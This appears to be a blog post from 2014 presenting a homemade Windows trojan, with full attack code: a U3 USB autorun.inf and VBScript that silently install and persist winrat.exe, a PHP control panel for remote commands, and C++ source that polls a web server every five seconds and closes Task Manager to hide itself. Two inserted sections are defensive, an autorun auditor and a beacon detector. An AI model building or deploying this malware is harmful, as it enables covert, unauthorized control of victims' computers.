Friday, 18 July 2014


Trojan In C++(One Of My Best)

 

I decided to post what I've created here. The trojan downloads 3 text files every 5 seconds, the text files contain a number, and based on that number it executes commands.

Before we start with the C++ code, I have a very easy way to get the trojan on the victim's computer. You just need a U3-enabled USB drive, USB access to the victim's computer, and the Universal Customizer. Delete the U3CUSTOM.ISO and create your own U3CUSTOM.ISO with these files included:

autorun.inf
CODE C Language
1 [AutoRun]
2 open=wscript go.vbs


go.vbs
CODE C Language
01 Dim FSO,File
02 Dim Date,Hour,Day,Backuppath,Daystring
03 Set FSO = CreateObject("Scripting.FileSystemObject")
04  
05 If Fso.FolderExists ("C:\Windows\trojan") Then
06    Set File= FSO.GetFile("C:\Windows\trojan\winrat.exe")
07    Date=File.DateLastModified
08    Day=DatePart("y",Date)
09    Daystring=CStr(Day)
10    Backuppath="C:\Windows\trojanbackup"+Daystring
11    Fso.MoveFolder "C:\Windows\trojan", Backuppath
12 End If
13  
14 FSO.CopyFolder ".\trojan", "c:\Windows\trojan", true
15  
16 Set oShell = CreateObject("WScript.Shell")
17 oShell.Run "C:\Windows\trojan\winrat.exe"
18  
19 If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") Then
20 If Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") Then
21 Else
22    FSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", true
23 End If
24 End If
25  
26 wscript.quit


Then, create a folder "trojan", and we'll later put the trojan files in there. You also need to create a file "Trojan.lnk"; it will be copied to the startup folder. Also place all the necessary DLLs in there for the program to run, for example urlmon.dll and wininet.dll.


Then create an ISO and run the U3 Updater to put the trojan on your U3 drive. Now it will automatically run go.vbs without any notice once you plug your U3 drive into any Windows XP computer (it will not work on Vista or 7; they have autorun disabled).
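From the defender's side, the autorun.inf above is easy to recognize: its `open=` key starts a script host instead of an installer. The following check is an added example, not part of the original post; the `audit_autorun` name, the interpreter list and the benign sample are assumptions made for illustration.

```python
import re

# Interpreters and loaders that a legitimate media autorun entry rarely needs.
SUSPECT_HOSTS = {"wscript", "cscript", "cmd", "powershell", "mshta", "rundll32"}
# Keys in the [AutoRun] section that cause a program to be launched.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)$", re.I)

def audit_autorun(text):
    """Return (key, command, reason) findings for one autorun.inf body."""
    findings = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        if not LAUNCH_KEY.match(key):
            continue  # icon=, label= and similar keys launch nothing
        words = command.replace('"', " ").split()
        if not words:
            continue
        # Program name without directory or extension.
        program = re.split(r"[\\/]", words[0])[-1].lower()
        program = program.rsplit(".", 1)[0] if "." in program else program
        if program in SUSPECT_HOSTS:
            findings.append((key.lower(), command, "launches script host " + program))
        elif SCRIPT_EXT.search(words[0]):
            findings.append((key.lower(), command, "launches a script file directly"))
    return findings

# The autorun.inf from this post, plus a constructed benign one for contrast.
POST_SAMPLE = "[AutoRun]\nopen=wscript go.vbs\n"
BENIGN_SAMPLE = "[autorun]\nicon=setup.ico\nlabel=Install Disc\nopen=setup.exe\n"

if __name__ == "__main__":
    for name, body in (("post", POST_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, audit_autorun(body))
```

On Windows XP hosts the matching mitigation is to disable AutoRun for all drive types through the `NoDriveTypeAutoRun` policy value.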






And also, before we start creating our program itself, we need a way to control it. As I said, the trojan downloads 3 files. Let's make these files on our web site/server. Create index.html, assign.html and target.html and don't put anything in there. Then we create a PHP file (edit.php) that is able to edit the html files. Why just PHP and not some normal application? Because this way we can control the trojan from anywhere by just going to yourwebsitehere.com/trojan/edit.php. You can even control computers with your mobile phone if you have mobile internet or Wifi.


<HTML>
<HEAD>
<TITLE>Winrat.exe Control Panel</TITLE>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
</HEAD>
<BODY>
<?phpif (isset($_POST['submit'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['option']);
fwrite($fh, $stringData);
fclose($fh);

$myFile2 = "target.html";
$fh = fopen($myFile2, 'w') or die("can't open file");
$stringData = stripslashes($_POST['target']);
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['clear'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = 0;
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['assigncomputer'])) {

$myFile = "assign.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['assign']);
fwrite($fh, $stringData);
fclose($fh);
}
?>
<div id="wrapper">
<form action="" method="post">
<textarea name="target" style="width: 230px; height: 25px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "target.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<textarea name="option" style="width: 230px; height: 60px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<input type="submit" name="submit" value="Edit" style="width: 150px; height: 40px" />
<input type="submit" name="clear" value="Clear" style="width: 65px; height: 40px" />
</form>
<?php
echo 'Current hack activated: <b>';

$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
</b>
<br /><br \><b>1.</b> Just some<br /><b>2.</b> HTML code<br /><b>3.</b> to remember<br /><b>4.</b> what commands<br /><b>5.</b> you can use.<br /><br />
<form action="" method="post">
<textarea name="assign" style="width: 190px; height: 30px; margin-bottom: 2px; font-size: 20px">
<?php
$myFile = "assign.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?> <br />
<input type="submit" name="assigncomputer" value="Assign" style="width: 190px; height: 25px;" />
</form>
</div>





Now we start with creating our winrat.exe, the trojan itself. Here's the source code:


CODE C Language
001 #include <windows.h>
002 #pragma comment(lib, "Winmm.lib")
003 #include <urlmon.h>
004 #pragma comment(lib, "urlmon.lib")
005 #include <iostream>
006 #include <fstream>
007 #include <WinInet.h>
008 #pragma comment(lib, "WinInet.lib")
009 #include <ShlObj.h>
010 using namespace std;
011  
012 int Option, Assign, Target;
013 DWORD WINAPI LowProfile(LPVOID);
014 DWORD WINAPI Option1(LPVOID);
015 DWORD WINAPI Option2(LPVOID);
016 DWORD WINAPI Option3(LPVOID);
017 DWORD WINAPI Option4(LPVOID);
018 DWORD WINAPI Option5(LPVOID);
019 // Add more lines of Option6, Option7, etc. to create more commands.
020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
021  
022 int main() {
023 // Hide Console Window
024 FreeConsole();
025  
026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
027  
028 // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.
029 FILE *istream;
030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
031     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
032 } else {
033 }
034  
035 // Store Assign.txt in a variable
036 ifstream inAssign;
037 inAssign.clear();
038 inAssign.open("c:\\Windows\\trojan\\assign.txt");
039 inAssign >> Assign;
040 inAssign.close();
041 inAssign.clear();
042  
043 // Start the main loop that is downloading the textfile each 5 seconds.
044 while(1) {
045  
046     // Download Option & Target
047     remove("c:\\Windows\\trojan\\option.txt");
048     remove("c:\\Windows\\trojan\\target.txt");
049     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
050     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
051     Sleep(100);
052     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
053     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
054  
055     // Read Option
056     ifstream inFile;
057     inFile.clear();
058     inFile.open("c:\\Windows\\trojan\\option.txt");
059     inFile >> Option;
060     inFile.close();
061     inFile.clear();
062  
063     // Read Target
064     ifstream inTarget;
065     inTarget.clear();
066     inTarget.open("c:\\Windows\\trojan\\target.txt");
067     inTarget >> Target;
068     inTarget.close();
069     inTarget.clear();
070  
071     // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)
072     if(Target == Assign || Target == 0) {
073         if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
074         else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
075         else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
076         else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
077         else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
078         // Add more of these lines for more commands
079     }
080     Sleep(5000);
081     }
082 }
083  
084 // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.
085 DWORD WINAPI LowProfile(LPVOID) {
086     while(1) {
087         // Obvious
088         TaskMgr = FindWindow(NULL,L"Windows Task Manager");
089         // May popup because of new hardware installation (U3)
090         SysError = FindWindow(NULL,L"System Settings Change");
091         // Windows Media Player may popup. Rarely happens, but had this once at a school computer.
092         WMP = FindWindow(NULL,L"Windows Media Player");
093         // The Removable Disk part of the U3 Drive can open automatically.
094         Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
095         Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
096         Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
097         Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
098         // Autoplay
099         Autoplay = FindWindow(NULL,L"Autoplay");
100         // Errors caused by our VBScript go.vbs
101         VBS = FindWindow(NULL,L"Windows Script Host");
102         if( TaskMgr != NULL) {
103             SetWindowText( TaskMgr,L"DIE!!!! =O");
104             Sleep(500);
105             PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
106         }
107         if( SysError != NULL) {
108             PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
109         }
110         if( WMP != NULL) {
111             Sleep(1000);
112             PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
113         }
114         if( Disk1 != NULL) {
115             PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
116         }
117         if( Disk2 != NULL) {
118             PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
119         }
120         if( Disk3 != NULL) {
121             PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
122         }
123         if( Disk4 != NULL) {
124             PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125         }
126         if( Autoplay != NULL) {
127             PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
128         }
129         if( VBS != NULL) {
130             PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
131         }
132         Sleep(500);
133     }
134 }
135  
136 //
137 // Here we start with our commands. Option1, Option2, Option3, etc.
138 // Don't forget to also define and create a process for these Options if you want to create more.
139 // Have Fun =D
140 //
141  
142 DWORD WINAPI Option1(LPVOID) { // 1
143     return 0;
144 }
145  
146 DWORD WINAPI Option2(LPVOID) { // 2
147     return 0;
148 }
149  
150 DWORD WINAPI Option3(LPVOID) { // 3
151     return 0;
152 }
153  
154 DWORD WINAPI Option4(LPVOID) { // 4
155     return 0;
156 }
157  
158 DWORD WINAPI Option5(LPVOID) { // 5
159     return 0;
160 }


That's our trojan. But it doesn't have any commands. You can do anything you want now. Run an FTP server in the background (I recommend SlimFTPd), open websites or applications, play a sound, open your CD drive, etc.
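The fixed `Sleep(5000)` polling loop above produces a very regular request pattern that stands out in web proxy logs. The detector below is an added example, not part of the original post; the log format, client addresses, thresholds and function names are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

def parse_line(line):
    """Parse one constructed 'epoch client url' proxy log line."""
    ts, client, url = line.split()
    return float(ts), client, url

def find_beacons(events, min_hits=6, max_period=60.0, max_jitter=0.1):
    """events: iterable of (epoch_seconds, client, url).
    Returns {(client, url): mean_period} for fixed-interval polling."""
    times = defaultdict(list)
    for ts, client, url in events:
        times[(client, url)].append(float(ts))
    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_hits:
            continue  # too few requests to judge regularity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period <= 0 or period > max_period:
            continue
        # Coefficient of variation: near 0 for a sleep loop, large for a person.
        if pstdev(gaps) / period <= max_jitter:
            beacons[key] = round(period, 2)
    return beacons

# Constructed sample: one host polling the two URLs from the post roughly
# every 5.2 s (5 s sleep plus download time), and one user browsing.
SAMPLE_LOG = [f"{1000 + i * 5.2 + (0.1 if i % 2 else 0):.1f} 10.0.0.23 {u}"
              for i in range(12)
              for u in ("http://www.yourwebsitehere.com/trojan/",
                        "http://www.yourwebsitehere.com/trojan/target.html")]
SAMPLE_LOG += [f"{t} 10.0.0.41 http://intranet.example/news"
               for t in (1000, 1003, 1040, 1042, 1130, 1131, 1300)]

if __name__ == "__main__":
    for (client, url), period in find_beacons(map(parse_line, SAMPLE_LOG)).items():
        print(f"{client} polls {url} every ~{period}s")
```

Only the polling host is reported; the browsing user has enough requests to be evaluated but fails the jitter test.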
